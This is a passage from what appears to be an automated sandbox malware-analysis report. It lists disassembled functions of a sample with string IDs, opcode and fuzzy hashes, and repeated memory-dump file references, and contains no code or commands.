                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 0123456789$0123456789ABCDEF$0123456789abcdef$:
                                          • API String ID: 0-3285806060
                                          • Opcode ID: c531c701763f9d2ac22cc3f2dedc5fa91cc6d925c5de7a05ae0d9a666a3887aa
                                          • Instruction ID: c52710cd63e27c23ef46ba6b92c915afd7db46c4c07e821fa6161016b2487a85
                                          • Opcode Fuzzy Hash: c531c701763f9d2ac22cc3f2dedc5fa91cc6d925c5de7a05ae0d9a666a3887aa
                                          • Instruction Fuzzy Hash: 3CD11772A293028BD7349E38D84137ABBD1AF95304F24C93DF8DD97281EB749964D782
                                          Function 0054CC90 Relevance: 5.4, Strings: 4, Instructions: 351COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .$@$gfff$gfff
                                          • API String ID: 0-2633265772
                                          • Opcode ID: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
                                          • Instruction ID: c940a3799172f9c5a541d1e040d7f8d27d6f975b15ffba445a9a95c79600f79c
                                          • Opcode Fuzzy Hash: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
                                          • Instruction Fuzzy Hash: 23D1C071A093068BD754DE29C48439BBFE2BFC4348F18C92DE8498B356E774DD098B92
                                          Function 005517A0 Relevance: 4.0, Strings: 2, Instructions: 1506COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $
                                          • API String ID: 0-227171996
                                          • Opcode ID: 5ffcae35da6cbda699788537eafeb440e46ced6cc2da84bd8fb6138c779f698d
                                          • Instruction ID: bc28a383146d963cea26d1925787c31de6d7962c68bdb207d2baf1ab7ea6a456
                                          • Opcode Fuzzy Hash: 5ffcae35da6cbda699788537eafeb440e46ced6cc2da84bd8fb6138c779f698d
                                          • Instruction Fuzzy Hash: 19E210B1A083428FD720DF29C09475ABFE0BB89745F158D1EE89997361E775E848CF82
                                          Function 00538BF0 Relevance: 3.0, Strings: 2, Instructions: 512COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: #$4
                                          • API String ID: 0-353776824
                                          • Opcode ID: bb159905c6c7776b817ef29572fa77689d455c4beedfeca4badc01881cd96337
                                          • Instruction ID: c69913218c82b4753d6792563e06132367b283a93b7644c364ad6835e7e0f0e1
                                          • Opcode Fuzzy Hash: bb159905c6c7776b817ef29572fa77689d455c4beedfeca4badc01881cd96337
                                          • Instruction Fuzzy Hash: BA22D2755087428FC318DF28C8806BAFBE4FF84318F158A2DE89997391D774A895CB96
                                          Function 00531BD0 Relevance: 3.0, Strings: 2, Instructions: 463COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: #$4
                                          • API String ID: 0-353776824
                                          • Opcode ID: 8c6442ad21fd0c17796323fa4a97b6694f938926aff987d17d07e0839adae3a5
                                          • Instruction ID: cf8a57b90ca3c152be078a83437b7a16a271b1dd72c94d35d366b41d54611ce2
                                          • Opcode Fuzzy Hash: 8c6442ad21fd0c17796323fa4a97b6694f938926aff987d17d07e0839adae3a5
                                          • Instruction Fuzzy Hash: DA120632608B118BC724CF28C4847ABBBE5FFD4318F198A7DE89957391D7359884CB96
                                          Function 00544780 Relevance: 2.9, Strings: 2, Instructions: 446COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: H$xn--
                                          • API String ID: 0-4022323365
                                          • Opcode ID: ba98885c81f7fa494bdd5047c8f455d032313bc0cf9080200a00e0465fad2ffd
                                          • Instruction ID: 8de9d955a73141e851830912ba7e8976797c2651269d4411240d58141a371b67
                                          • Opcode Fuzzy Hash: ba98885c81f7fa494bdd5047c8f455d032313bc0cf9080200a00e0465fad2ffd
                                          • Instruction Fuzzy Hash: 2CE11871A487158BD718DE28D8C07AABBE2BFC4318F198A3DD99687381D774DC458B42
                                          Function 001D10E6 Relevance: 2.8, Strings: 2, Instructions: 347COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Downgrades to HTTP/1.1$multi.c
                                          • API String ID: 0-3089350377
                                          • Opcode ID: 16cfab9c72c07feea72fcb962143d02b4993b0a2bc776595f054dc9704713b89
                                          • Instruction ID: 5abdeb7c3fbe54e48e6694fabdde2b30e1c51552730e81e5de470edb927dc62e
                                          • Opcode Fuzzy Hash: 16cfab9c72c07feea72fcb962143d02b4993b0a2bc776595f054dc9704713b89
                                          • Instruction Fuzzy Hash: 85C12471A08701BBD714DF64D8817AAB7E1BFA5304F04852EF49887392E7B0E958CB82
                                          Function 0022A5B0 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: M 0.$NT L
                                          • API String ID: 0-1807112707
                                          • Opcode ID: 43ef8f4cb8a2e48825449819b87a30711f483b322bb4026688efa03daf32e17e
                                          • Instruction ID: 97f02a8232569fed3bf3a3868736c55e20cb16e2490135ea2d4fc5cfa999bb43
                                          • Opcode Fuzzy Hash: 43ef8f4cb8a2e48825449819b87a30711f483b322bb4026688efa03daf32e17e
                                          • Instruction Fuzzy Hash: 08510774620315ABDB21CF20D8847AAB3F8BF58304F14856DFC489F642D7B5DA94CB9A
                                          Function 004DAE30 Relevance: 1.8, Strings: 1, Instructions: 598COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: M"
                                          • API String ID: 0-1954997296
                                          • Opcode ID: d9e1dffb9c167f2a1bfd412aa57ca9546c7a865265bd6293c312d3add4af8ce4
                                          • Instruction ID: 0eaaa01d3fb61a77658ffa4ddde28994ebfaed222ffe25687761ee9d9098d6a3
                                          • Opcode Fuzzy Hash: d9e1dffb9c167f2a1bfd412aa57ca9546c7a865265bd6293c312d3add4af8ce4
                                          • Instruction Fuzzy Hash: 752264735417044BE318CF2FCC81582B3E3AFD822475F857EC926CB696EEB9A61B4548
                                          Function 0028E3E0 Relevance: 1.8, Strings: 1, Instructions: 550COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: \
                                          • API String ID: 0-2967466578
                                          • Opcode ID: dfcff83fd38ce01995022f358ada78865863b1af08e103272fe11dccc299c01d
                                          • Instruction ID: ea080a556c427af0bc1ed409ed1b9fb7a891f12fb92d85f07f8182d0b1db23ee
                                          • Opcode Fuzzy Hash: dfcff83fd38ce01995022f358ada78865863b1af08e103272fe11dccc299c01d
                                          • Instruction Fuzzy Hash: 2D02C46D9263166BEB20BE20DC42B2F76989F50704F054439FD99961D3F624ED388BA3
                                          Function 002900E0 Relevance: 1.5, Strings: 1, Instructions: 272COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: H
                                          • API String ID: 0-2852464175
                                          • Opcode ID: c78799917f98244fbbae6f37633f6a1f8a0cae5fc04d8ad02d72ec245ffb64b6
                                          • Instruction ID: 389df6bb63564ecd56fbbb834cffb0f694103415a5df31bbc1796ed4ba741060
                                          • Opcode Fuzzy Hash: c78799917f98244fbbae6f37633f6a1f8a0cae5fc04d8ad02d72ec245ffb64b6
                                          • Instruction Fuzzy Hash: FC91C431B183158FCF18CE1CC4D062EB7E3ABC9314F1A857DD99A97391DA31AC568B86
                                          Function 0022B560 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1668694106.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                          • Associated: 00000000.00000002.1668672539.00000000001C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1668694106.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669189240.000000000090B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000A93000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C8D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669206620.0000000000C9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669533561.0000000000C9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669659474.0000000000E52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1669679705.0000000000E54000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_1c0000_XJiB3BdLTg.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: curl
                                          • API String ID: 0-65018701
                                          • Opcode ID: 2a9a52c239f0af7f8dde641fdf2fcd7fd2c89cb81284bcc3e78a1a75c5120bb1
                                          • Instruction ID: 7931fbe7f742cc8f07c74ac2efde7e2efa23a3e5be4da2f3225826ced02dc882
                                          • Opcode Fuzzy Hash: 2a9a52c239f0af7f8dde641fdf2fcd7fd2c89cb81284bcc3e78a1a75c5120bb1
                                          • Instruction Fuzzy Hash: AD61A6B18147459BD711DF14D841BEBB7E8FF95304F04862DED888B212E731E698C752
                                          Function 0053CD80 Relevance: .6, Instructions: 574COMMON
                                          Download Yara Rule
                                          Memory Dump Source
